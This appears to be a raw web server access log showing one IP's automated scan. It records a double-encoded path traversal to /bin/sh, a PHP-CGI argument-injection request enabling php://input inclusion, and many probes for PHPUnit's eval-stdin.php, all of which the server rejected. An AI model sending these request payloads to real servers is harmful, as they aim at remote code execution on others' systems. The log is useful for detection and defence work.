120.195.30.140 - - [01/Oct/2024:15:27:05 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:07 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:08 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:09 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:09 +0200] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:10 +0200] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:10 +0200] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:11 +0200] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:11 +0200] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:12 +0200] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:12 +0200] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:13 +0200] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:13 +0200] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:14 +0200] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:15 +0200] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:16 +0200] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:16 +0200] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:17 +0200] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:17 +0200] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
120.195.30.140 - - [01/Oct/2024:15:27:18 +0200] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - "-" "Custom-AsyncHttpClient"
